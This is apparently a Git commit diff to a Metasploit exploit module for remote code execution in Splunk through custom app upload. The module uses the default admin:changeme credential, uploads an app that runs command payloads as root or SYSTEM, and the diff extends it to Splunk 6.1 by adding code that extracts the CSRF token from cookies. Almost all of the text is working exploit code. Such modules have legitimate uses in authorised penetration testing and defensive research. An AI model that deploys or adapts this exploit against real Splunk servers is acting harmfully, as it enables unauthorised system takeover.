Merge #3507 into local, recently updated branch of master for landing

bug/bundler_fix
Jon Hart 2014-10-30 17:28:20 -07:00
commit 55f245f20f
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 24 additions and 10 deletions


@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Splunk 5.0 Custom App Remote Code Execution',
'Name' => 'Splunk Custom App Remote Code Execution',
'Description' => %q{
This module exploits a feature of Splunk whereby a custom application can be
uploaded through the web based interface. Through the 'script' search command a
@ -20,14 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote
perl or python code. To abuse this behavior, a valid Splunk user with the admin
role is required. By default, this module uses the credential of "admin:changeme",
the default Administrator credential for Splunk. Note that the Splunk web interface
runs as SYSTEM on Windows, or as root on Linux by default. This module has only
been tested successfully against Splunk 5.0.
runs as SYSTEM on Windows, or as root on Linux by default. This module has been
tested successfully against Splunk 5.0, 6.1, and 6.1.1.
},
'Author' =>
[
"marcwickenden", # discovery and metasploit module
"sinn3r", # metasploit module
"juan vazquez" # metasploit module
"juan vazquez", # metasploit module
"Gary Blosser" # metasploit module updates for Splunk 6.1
],
'License' => MSF_LICENSE,
'References' =>
@ -44,13 +45,13 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => %w{ linux unix win },
'Targets' =>
[
[ 'Splunk 5.0.1 / Linux',
[ 'Splunk >= 5.0.1 / Linux',
{
'Arch' => ARCH_CMD,
'Platform' => %w{ linux unix }
}
],
[ 'Splunk 5.0.1 / Windows',
[ 'Splunk >= 5.0.1 / Windows',
{
'Arch' => ARCH_CMD,
'Platform' => 'win'
@ -96,6 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
# set up some variables for later use
@auth_cookies = ''
@csrf_form_key = ''
@csrf_form_port = "splunkweb_csrf_token_#{rport}" #Default to using rport, corrected during tokenization for v6 below.
app_name = 'upload_app_exec'
p = payload.encoded
print_status("Using command: #{p}")
@ -121,11 +123,11 @@ class Metasploit3 < Msf::Exploit::Remote
{
'uri' => '/en-US/api/search/jobs',
'method' => 'POST',
'cookie' => @auth_cookies,
'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
'headers' =>
{
'X-Requested-With' => 'XMLHttpRequest',
'X-Splunk-Form-Key' => @csrf_form_key
'X-Splunk-Form-Key' => @csrf_form_key # Version 6 ignores extra headers (verified)
},
'vars_post' =>
{
@ -274,7 +276,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'uri' => '/en-US/manager/appinstall/_upload',
'method' => 'POST',
'cookie' => @auth_cookies,
'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Does not seem to require the cookie, but it does not break it. I bet 6.2 will have a cookie here too.
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => data
}, 30)
@ -294,8 +296,20 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'GET',
'cookie' => @auth_cookies
})
res.body.match(/FORM_KEY":\ "(\d+)"/)
res.body.match(/FORM_KEY":\ "(\d+)"/) # Version 5
@csrf_form_key = $1
unless @csrf_form_key # Version 6
res.get_cookies.split(';').each {|c|
c.split(',').each {|v|
if v.split('=')[0] =~ /splunkweb_csrf_token/ #regex as the full name is something like splunkweb_csrf_token_8000
@csrf_form_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
@csrf_form_key = v.split('=')[1]
end
}
}
end
fail_with(Failure::Unknown, "csrf form Key not found") if not @csrf_form_key
end